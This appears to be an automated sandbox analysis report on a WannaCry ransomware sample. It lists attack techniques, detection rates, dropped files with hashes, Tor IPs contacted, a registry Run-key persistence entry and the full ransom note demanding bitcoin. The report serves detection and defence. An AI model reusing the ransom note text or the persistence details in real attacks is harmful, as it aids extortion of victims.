Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Services File Permissions Weakness	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Wannacry.exe	100%	Avira	TR/Ransom.JB
Wannacry.exe	92%	ReversingLabs	Win32.Ransomware.WannaCry
Wannacry.exe	94%	Virustotal		Browse
Wannacry.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	TR/FileCoder.724645
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	TR/FileCoder.724645
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Joe Sandbox ML
C:\@WanaDecryptor@.exe	100%	Joe Sandbox ML
C:\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\AppData\Local\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\TaskData\Tor\libeay32.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\tor.exe	0%	ReversingLabs
C:\Users\user\Desktop\TaskData\Tor\zlib1.dll	0%	ReversingLabs
C:\Users\user\Desktop\taskdl.exe	89%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\taskse.exe	89%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\u.wnry	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Documents\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Downloads\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\Default\Desktop\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\Public\Desktop\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\found.001\@WanaDecryptor@.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://freehaven.net/anonbib/#hs-attack06	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	0%	Virustotal		Browse
http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw	0%	Virustotal		Browse
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	0%	Virustotal		Browse
http://freehaven.net/anonbib/#hs-attack06	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	@WanaDecryptor@.exe, @WanaDecryptor@.exe, 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000002.5854829529.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000002.2348372222.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe0.0.dr	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
http://www.openssl.org/support/faq.htmlRAND	taskhsvc.exe, 0000001F.00000002.5874181370.000000006D1DD000.00000002.00000001.01000000.00000010.sdmp	false		high
https://blog.torproject.org/blog/lifecycle-of-a-new-relayError	@WanaDecryptor@.exe, 0000001B.00000003.2037130930.0000000002863000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
https://www.google.com/search?q=how	@WanaDecryptor@.exe, 00000021.00000002.5857492036.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000002.2348372222.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe0.0.dr	false		high
https://www.torproject.org/download/download#warningalphabetaThis	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
http://www.openssl.org/V	taskhsvc.exe, 0000001F.00000002.5869999732.000000006D03C000.00000008.00000001.01000000.0000000F.sdmp, taskhsvc.exe, 0000001F.00000002.5875196213.000000006D25A000.00000008.00000001.01000000.00000010.sdmp	false		high
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	Wannacry.exe, 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000002.5854829529.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000002.2348372222.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe0.0.dr	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.zlib.net/D	@WanaDecryptor@.exe, 0000001B.00000003.2036998124.0000000002768000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001B.00000003.2036775143.0000000002761000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5878121142.000000006FFC0000.00000008.00000001.01000000.00000011.sdmp	false		high
http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw	@WanaDecryptor@.exe, 00000021.00000002.5857492036.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
https://www.torproject.org/documentation.html	taskhsvc.exe.27.dr	false		high
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B	@WanaDecryptor@.exe, 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmp	false		high
https://www.torproject.org/download/download#warning	taskhsvc.exe, 0000001F.00000002.5865453654.00000000015FA000.00000004.00000010.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$	@WanaDecryptor@.exe, 0000001B.00000002.5853881951.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120270411.000000000019B000.00000004.00000010.00020000.00000000.sdmp	false		high
https://www.torproject.org/	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
https://trac.torproject.org/8742	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
http://freehaven.net/anonbib/#hs-attack06	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.torproject.org/docs/faq.html#BestOSForRelay	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip	@WanaDecryptor@.exe, 00000021.00000002.5853775977.000000000019A000.00000004.00000010.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	taskhsvc.exe, 0000001F.00000002.5874181370.000000006D1DD000.00000002.00000001.01000000.00000010.sdmp	false		high
https://blog.torproject.org/blog/lifecycle-of-a-new-relay	@WanaDecryptor@.exe, 0000001B.00000003.2037130930.0000000002863000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high
https://trac.torproject.org/projects/tor/ticket/14917.	taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.109.206.212	unknown	Netherlands	3265	XS4ALL-NLAmsterdamNL	false
199.254.238.52	unknown	United States	16652	RISEUPUS	false
212.47.237.95	unknown	France	12876	OnlineSASFR	false
86.59.21.38	unknown	Austria	8437	UTA-ASAT	false
5.39.92.199	unknown	France	16276	OVHFR	false
51.254.246.203	unknown	France	16276	OVHFR	false
146.185.177.103	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	false
131.188.40.189	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
163.172.157.213	unknown	United Kingdom	12876	OnlineSASFR	false
78.142.142.246	unknown	Austria	8437	UTA-ASAT	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1292085
Start date and time:	2023-08-16 14:46:46 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 22m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Wannacry.exe
Detection:	MAL
Classification:	mal100.rans.spyw.evad.winEXE@37/690@0/11
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 74.3%) Quality average: 59.9% Quality standard deviation: 38.8%
HCA Information:	Successful, ratio: 77% Number of executed functions: 201 Number of non-executed functions: 183
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, VSSVC.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing behavior information.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:50:46	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run uqcbeegnpjpsq661 "C:\Users\user\Desktop\tasksche.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Yara Hits:	Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	7.839412875468901
Encrypted:	false
SSDEEP:	24:bkFd9lVGlLiHFdAvaPe813fuF/Yd1xpoAVpwkUUPXddSYFqLkVw4bk/61:bkFd9/Hv0FABDVpw1UPt3FqLka4Q/I
MD5:	0D6BDAE6AE223B56A368CC24B051FCD2
SHA1:	42E5B526EB2FB626BF0CE199F0485743E34700C6
SHA-256:	4828CFCDB9DBBBF36F4702C2AE2DCACC10A84F5B34A8CC29E5669E21805D3D97
SHA-512:	2F24199F5F71315B54EB16BC72873CF05AA41F4067DC7AFC7B1C135BCC37D4D491ECFFCF7AED4033C57F85936647469028E0D8B42CA82ADCC0D7BBD7E092EA67
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....T/P..~.a-f.?.~op.. .@A...&S....cD...~....,....&...W......!.....C8..r.......+......<.$..F%P.p...U.\|F.t..{....n.z..:,...Of>..\|........._R.2g.0...i....<k.=..W.HP.(.\.$=N5.l...L.PX...,.$..V/......o....~..i..[.....S~2.t..+..'U.yq.6.vy..z....,..?....=..........~...?0.wg$v...0.5..L.....E...4Oo...N1.M_..`.....a.<..v...h.[.j....'.;..Z..T.....\....sN.Ab.D.j..2z.<.a..W2.@....u....C'.g..W:b..].'.$;t~..]..X.....yH..._.-wj3}..H.....C....w...E.L.:=}.vlNH~p~5f.........F.T..t.S....T.8'..P.......OM.C...RD..i..z..G..s...\.2V...J.....3n..6]..a..a.....i).\...aZ....M"{...C.>.i,......r*C{.. "..G.WZ)..]..L(.......M.....<.N/.l.b.ru....6._..'....M'...o.M....9y)}~.:....U.S).pbY..A.`.Z~blX.@m&..rg..K.....F...+.Q-.H.....A%...W......w^.sq."\i{..h..q@....u.-$O.&.L^.H.Q..2...~G....Y.D8..s.0....=.O.2)a.h.....&(ITf....U9M....%l(M...}=......W..h.)Ex..5."$r.Q..W.T#...'Y..yj...Ix.,.jk..;UN..rt.X...\|..x.b....ld.E...%................i.D{.m..'V.{.0.]..T.....8.?.

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5096
Entropy (8bit):	7.966846193416098
Encrypted:	false
SSDEEP:	96:onsE3a05Z6DWVG5OZZ1n4aWIUC0vW8NFsMRyqVHJVKidIC+QhEPYo8M0wn:oadSVZZjnVLN8NFXRy2Kid5P2PaFs
MD5:	AB73133664F61C5AC748E0316CAE2F2B
SHA1:	F08D809008A14AB02D5110DC8C2F8FE47386069E
SHA-256:	4FEFC2EC7F7CC9EEE26F902ECEA927D1520768683EA60B4E0FCD7F099FDCD728
SHA-512:	1298B7EA3FD4F770120A27E992E61DD9BA42479A6E1C56819B13B1F70662B4E5F83281348055DE3E63C84597DC39BAC21A4CAC7353B881FE669433A1CFC911B3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......g.~.R..i..\.c..CsDT.7..r..H.r.sn8wq\..Y..%..o.p..B.G......+.L.... >.""......D..`.@.v%.....S{x.\|...LS..t4M...k.....DY.$Ckk.B\..X..f.5.f.0kw..5....f...[gp......W..=..'>.w8%.,pgX6....W,H.....d.'!.N4.T>........_.s........o...9.C>B1.7....M.<.0.............&...,. ....+..`_...)(...L.c....F}.X....5..._+.+.5.s...`.x.7.6"Q..........{.3`-.......?.....Lz..*.........\.T....t..E...Hs.....+...B...[..w.I^......uG~.sQg.F4x.7.....+foC.>X..h.....sd.$.\d.....P..f.......x}I.G.c.7H].[..8."+;.5.tN...T.<.P..jP...n.e..aMm3...#.......I.e.DX.....Zeg.J...;...SL..O..........FB.e.). .c_vU}."#........tV..=DU.t.........3v.aUq.......m.A.T..B.[......-....)^...yB..7..W..c@`/....q..#. ....D..N..!...E.V.f.;.m..H.SZ%i....\(......H8...r..n%J.Jz.?....Hr.+z..G.&.{.....IlQ.`..e......9.q^.LA..b.....Fe.).......N.I<.{..]......~..c.U+4l/?.">ck..y....e...be.l.c.X=\|jq..m.....T.........clJ@T........Q:......\|.....N....^,...V.xa..\|.....ja...S0.....6.T.fQ...U)b)...

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5096
Entropy (8bit):	7.9579772309830155
Encrypted:	false
